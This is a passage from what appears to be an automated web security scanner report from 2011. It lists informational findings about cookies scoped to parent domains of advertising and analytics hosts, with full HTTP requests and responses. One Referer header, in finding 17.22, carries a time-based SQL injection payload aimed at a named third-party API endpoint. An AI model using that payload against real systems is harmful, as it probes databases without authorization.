Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 06 May 2011 17:41:20 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sun, 05-May-2013 17:41:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

17.13. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=dedominion&d.x=241937932&d.t=page&d.u=http%3A%2F%2Fdominionenterprises.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 06 May 2011 18:39:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sun, 05-May-2013 18:39:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
17.14. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2250&token=EXPD1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; V=wOebwAz4UvVv; FC1-WC=^53620_1_2QLwy

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Mon, 30-Apr-2012 22:33:36 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F05%2F2011%3BEXPD1; Domain=.contextweb.com; Expires=Sat, 09-Apr-2016 22:33:36 GMT; Path=/
Content-Type: image/gif
Date: Fri, 06 May 2011 22:33:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
17.15. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dc4e03312c53e71&callback=_ate.ad.hrr&pub=xa-4aa4857d5e87e10e&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.clone-systems.com%2Fecommerce%2Fproducts%2FPenetration-Testing-On-Demand.html&ref=http%3A%2F%2Fwww.clone-systems.com%2Fecommerce%2Fcategories%2FPenetration-Testing%2F&v16xwn HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1304471550.1FE|1304471550.1OD|1304471550.60; dt=X; psc=2; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 07 May 2011 01:17:42 GMT
Set-Cookie: di=1304471550.60|1304471550.1OD|1304471550.1FE; Domain=.addthis.com; Expires=Mon, 06-May-2013 01:17:42 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 06-Jun-2011 01:17:42 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Sat, 07 May 2011 01:17:41 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
17.16. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97:903d/294e3; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a:c4717d7/294e3/12504287/903d/4dc49ebc; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sat, 07 May 2011 01:22:03 GMT
Connection: close

17.17. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=2546&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=&NS_ru=&NS_rn=22187&NS_js=1.6&NS_vp=http%3A//tours.sapha.com/%3Fscs_sid%3D2546%26scs_tid%3D25%26scscs%3D1&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=2546&scs_tid=25&scscs=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:06:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; expires=Mon, 03-May-2021 22:06:08 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

17.18. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=1&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_1_19=110076%7C2676570%7C2668748%7C2011-05-06+16%3A05%3A33; expires=Mon, 03-May-2021 22:05:33 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

17.19. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543660bb HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXNzmEri$NP^zjJv16.uOiiIAJm'i/?`wtMan.OL7JR%9_Qi'sH?P8)dD_cwkfN=J6^G_S2VZyFVB)VG2Vw2thPTUbP<wWYepcQ?p3>xz(+n$Re8'MY-mhu#.Xt]9[@nN+Ds+7'8q_!*9MdOq3NdJdss.Hj'/sFJ<-+z3E0EE7j)M961RbGb1dj#L@[9dW/NyqWx!_x)fy):[Aa=QO!jG:eNKR)GNwxNn+ffW'EqWJgi1p9#uqJ2MdA<fq#d/OW8$mC<6O.FQ6^>L-!w71A$]900:P$P<mQfUC(KA9X.t8gFMHTn1=0S6u_D96a?e(y#41L9alTN8lk+phc8qcDDwI#ht*Ojk$^h/f:4!*=PA8ETumU6=Lq?'LZXd)U<toDTN:^atTHtT9bQ$L$A.Vxr9-Ty'Y$?/v<XcvtB4/?l*9vZEk.r)kLPE6cj7OE<Wt?Q*xbt7KIuF6C=Ld+zNWABEs>Sa5%-[[n4b1!c`

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 08-May-2011 11:30:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 05-Aug-2011 11:30:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 05-Aug-2011 11:30:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXNzmEri$NP^zjJv16.uOiiIAJm'i/?`wtMan.OL7JR%9_Qi'sH?P8)dD_cwkfN=J6^G_S2VZyFVB)VG2Vw2thPTUbP<wWYepcQ?p3>xz(+n$Re8'MY-mhu#.Xt]9[@nN+Ds+7'8q_!*9MdOq3NdJdss.Hj'/sFJ<-+z3E0EE7j)M961RbGb1dj#L@[9dW/NyqWx!_x)fy):[Aa=QO!jG:eNKR)GNwxNn+ffW'EqWJgi1p9#uqJ2MdA<fq#d/OW8$mC<6O.FQ6^>L-!w71A$]900:P$P<mQfUC(KA9X.t8gFMHTn1=0S6u_D96a?e(y#41L9alTN8lk+phc8qcDDwI#ht*Ojk$^h/f:4!*=PA8ETumU6=Lq?'LZXd)U<toDTN:^atTHtT9bQ$L$A.Vxr9-Ty'Y$?/v<XcvtB4/?l*9vZEk.r)kLPE6cj7OE<Wt?Q*xbt7KIuF6C=Ld+zNWABEs>Sa5%-[[n4b1!c`; path=/; expires=Fri, 05-Aug-2011 11:30:47 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 07 May 2011 11:30:47 GMT

GIF89a.............!.......,........@..L..;
17.20. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11262&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl:^crKe$Wt1spbWUvBdow<veb?3Uw`Qylwh>p+^c'w%R-eMV?4^a>]$!X9^RDTuLuZpl9=dIc4+hibOXVH]pX=n*N(IkV+>q<CtTaN9@TN[vcG0YnP[_kkdtZBM#*BPkSG*sGn'qtqEJRfmh/cT#?=zqiY3ojM*]3^))_1Y3qRhU>:L>>!Dl)nYWN]gI2[kI2tJIZ+8FY]jN]+3(Qs9TATHl_7jT6#4h1a$W8*.7q9]zqQE#xGPcCk0juhVuVnPk#`*0g?hvB@e$+*M!]Z7]Ptt.#jlw#oBt@MSlp@?XwWY[Zrh8s4X$Zn5(MSVl@QZq<pb6Inz$; uuid2=2724386019227846218; sess=1

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 21:06:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Thu, 04-Aug-2011 21:06:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Thu, 04-Aug-2011 21:06:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXNzmEri$NP^zk89j)%O%[Dq_qBiP:ZEtjuJe$ztL5<-PEKcujlYsG0Oi%Es_TfXqJ@b9)BNW$h4GQ'kB2sBmWI<!H%wwv6RMjuZgf]dy-qA:lfQD>k1VS*<Ds+7'8q^x)9OGo:*eHfDKw-eGPDE=7Y`p'*47rh)q#F[XU(h<CU!c+81]xA>Sq9y>vaE`!oi#9l24%8e!G9^o8qHu1d<wou'EE<Q4XP=qFe+1Pw8a5en>rpu!as4i.3)d0-*K_f-A5:TNh*`2#N=-)/H7@[Hfu@3PoN6?(L.Eac3uwVZ'IZLA`.ZC15pJ!+)d/XrHP1HGSupCXe=<4wn<IL%erqPAShL[Uy0[f]+>:LHv:_du%)*-+(fM0+(qUzu4@bIe>'Hf$qokH`1qa9g6+#6fEAq219Wb-V!8gUnpP@D[=[buY^B3d+0*$6%$=<17Gw'd5a]%#w#R0t!22N$.tmXG; path=/; expires=Thu, 04-Aug-2011 21:06:48 GMT; domain=.adnxs.com; HttpOnly
Location: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Date: Fri, 06 May 2011 21:06:48 GMT
Content-Length: 0

17.21. http://id.google.com/verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=PCI+Scanning+and+PCI+Compliance+powered+by+Clone+Guard
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=E_SNEpllEIM0mu8Tx9WZCn__1_oR5LOkxDVJs7IfNA=z61mkU6TUP6EuG26; NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=Ay0e2w2n3jC-m-k6SXDoS8UTfSUSpmmUkw5w4EnkIWdmSARAMvdk3JZ85Sk12X7KnWqtJmYUDWUTP7WVbbeKLpXxEUan1Z_zQ8RUYu8VYWQgSVKgD8i-D_XwsbskId3a; expires=Sun, 06-Nov-2011 01:15:24 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 07 May 2011 01:15:24 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.22. http://id.google.com/verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=GET+%2Fapi%2FgetApi.php%3Freturn%3Djson%26cb%3DgetPubGA_onSuccess%26service%3DgetPublisherDomains%26publisher%3D-111%2527%2520OR%2520SLEEP(25)%3D0%2520LIMIT%25201--%2B+HTTP%2F1.1User-Agent%3A+Mozilla%2F4.0+(compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%3B+.NET+CLR+1.1.4322)Cache-Control%3A+no-cacheHost%3A+wd.sharethis.comAccept-Encoding%3A+gzip%2C+deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=0q_cRlN3FaLTWUdqKkl2WcfwjGvunxkxkwmHSo8dNA=YhUM70m4peP2kMIG; NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=E_SNEpllEIM0mu8Tx9WZCn__1_oR5LOkxDVJs7IfNA=z61mkU6TUP6EuG26; expires=Sat, 05-Nov-2011 23:25:37 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 06 May 2011 23:25:37 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.23. http://image.providesupport.com/js/advancedaccess/safe-monitor.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=wmi0souExiDc;Path=/;Domain=.providesupport.com
Content-Length: 2851
Date: Fri, 06 May 2011 18:39:55 GMT
Connection: close

var psdTmJsid = "wmi0souExiDc";
// safe-monitor@gecko.js

var psdTmJiso;
try {
   psdTmJiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psdTmJwid != null);
} catch(e) {
   psdTmJi
...[SNIP]...
17.24. http://image.providesupport.com/js/charlesw/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/charlesw/safe-standard.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/charlesw/safe-standard.js?ps_h=u2TY&ps_t=1304725192651 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
